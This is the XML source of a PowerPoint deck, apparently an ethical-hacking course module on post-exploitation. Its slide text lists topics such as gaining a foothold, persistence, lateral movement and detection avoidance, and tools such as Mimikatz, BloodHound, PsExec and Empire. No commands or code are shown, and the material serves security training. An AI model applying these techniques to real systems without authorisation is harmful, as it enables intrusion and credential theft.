                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>BloodHound</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">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Windows Remote Management (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>WinRM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a: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Windows Management Instrumentation (WMI)</a:t>
                      </a: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PowerShell commands (see table in 8.2.3)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>sudo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> command</a:t>
                      </a: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Empire</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Mimikatz</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Nyeta</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>PsExec</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRP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vertical privilege escalation</a:t>
                      </a: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horizontal privilege escalation</a:t>
                      </a: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media sanitation</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">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Steganography</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>steghide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> command</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914353655"/>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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1766237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543050"/>
            <a:ext cx="6400800" cy="2571750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="101" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4114800"/>
            <a:ext cx="3657600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ethical Hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Chương trình Học viện công nghệ BKACAD">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEB601AA-26BF-3836-78B9-517B99F784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3186" y="568927"/>
            <a:ext cx="1944414" cy="4597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457200"/>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Module Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7188AF34-F17D-65FE-91B6-733B90851DC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116793" y="460408"/>
            <a:ext cx="8695135" cy="583388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>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30000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Module Title:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Module Objective:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Explain how to perform post-exploitation activities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40064EF4-EE2B-342C-EA9E-699582F380FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="988526547"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="334273" y="1293962"/>
          <a:ext cx="8699498" cy="1620520"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3825874">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1540795028"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4873624">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2968452238"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Topic Title</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Topic Objective</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="317262977"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Creating a Foothold and Maintain Persistence After Compromising a System</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Explain how to create a foothold and maintain persistence after compromising a system.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2377890904"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Explain how to perform lateral movement, detection avoidance, and enumeration.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2281025351"/>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Chương trình Học viện công nghệ BKACAD">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EAE1F62-0312-0D1A-0589-335CF2A8C6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504" y="4629150"/>
            <a:ext cx="966768"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672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057399"/>
            <a:ext cx="8229600" cy="2344119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8.1: Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4600" dirty="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6cf0ffbd-cd96-4ba4-bd4f-bd34e8409846">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="ef7ae401-bd17-41a5-97cb-ef653218410e" xsi:nil="true"/>
    <Hyperlink xmlns="6cf0ffbd-cd96-4ba4-bd4f-bd34e8409846">
      <Url xsi:nil="true"/>
      <Description xsi:nil="true"/>
    </Hyperlink>
    <SharedWithUsers xmlns="ef7ae401-bd17-41a5-97cb-ef653218410e">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </SharedWithUsers>
    <MediaLengthInSeconds xmlns="6cf0ffbd-cd96-4ba4-bd4f-bd34e8409846"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8F9F34832A35489A19D5E200F54CC8" ma:contentTypeVersion="19" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="215db7e03b3f81d13e12b47a43431ead">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="6cf0ffbd-cd96-4ba4-bd4f-bd34e8409846" xmlns:ns3="ef7ae401-bd17-41a5-97cb-ef653218410e" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b2710064e6242af8a2520d7ce33544cd" ns2:_="" ns3:_="">
    <xsd:import namespace="6cf0ffbd-cd96-4ba4-bd4f-bd34e8409846"/>
    <xsd:import namespace="ef7ae401-bd17-41a5-97cb-ef653218410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element ref="ns2:MediaLengthInSeconds" minOccurs="0"/>
                <xsd:element ref="ns3:TaxCatchAll" minOccurs="0"/>
                <xsd:element ref="ns2:lcf76f155ced4ddcb4097134ff3c332f" minOccurs="0"/>
                <xsd:element ref="ns2:Hyperlink"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f0ffbd-cd96-4ba4-bd4f-bd34e84098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710261dd-85c0-4e16-8580-30375acfae1f" ma:termSetId="09814cd3-568e-fe90-9814-8d621ff8fb84" ma:anchorId="fba54fb3-c3e1-fe81-a776-ca4b69148c4d" ma:open="true" ma:isKeyword="false">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element ref="pc:Terms" minOccurs="0" maxOccurs="1"/>
        </xsd:sequence>
      </xsd:complexType>
    </xsd:element>
    <xsd:element name="Hyperlink" ma:index="23" nillable="true" ma:displayName="Hyperlink" ma:format="Hyperlink" ma:internalName="Hyperlink">
      <xsd:complexType>
        <xsd:complexContent>
          <xsd:extension base="dms:URL">
            <xsd:sequence>
              <xsd:element name="Url" type="dms:ValidUrl" minOccurs="0" nillable="true"/>
              <xsd:element name="Description" type="xsd:string" nillable="true"/>
            </xsd:sequence>
          </xsd:extension>
        </xsd:complexContent>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f7ae401-bd17-41a5-97cb-ef653218410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caefe5af-a435-4393-a14b-6f721e236a53}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="ef7ae401-bd17-41a5-97cb-ef653218410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551257-9976-4DFA-AF04-E8B3661B046E}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="20a0b39e-fcd0-423b-9f17-9d26d967be51"/>
    <ds:schemaRef ds:uri="810553ce-449d-4340-bb0a-414d416a9b51"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="6cf0ffbd-cd96-4ba4-bd4f-bd34e8409846"/>
    <ds:schemaRef ds:uri="ef7ae401-bd17-41a5-97cb-ef653218410e"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{46388CC2-23BA-407E-A16F-1B3ECB8288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f0ffbd-cd96-4ba4-bd4f-bd34e8409846"/>
    <ds:schemaRef ds:uri="ef7ae401-bd17-41a5-97cb-ef65321841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3AC4121-1C78-4402-A8E9-7F09CBD9DA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30</TotalTime>
  <Words>9225</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>1071</Paragraphs>
  <Slides>64</Slides>
  <Notes>64</Notes>
  <HiddenSlides>8</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Arial,Sans-Serif</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Nguyen Ngoc Tuan</cp:lastModifiedBy>
  <cp:revision>847</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-03T22:07:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-30T06:21:57Z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0x010100198F9F34832A35489A19D5E200F54CC8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Order">
    <vt:r8>4156900</vt:r8>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="xd_Signature">
    <vt:bool>false</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="xd_ProgID">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TriggerFlowInfo">
    <vt:lpwstr/>
  </property>
</Properties>
</file>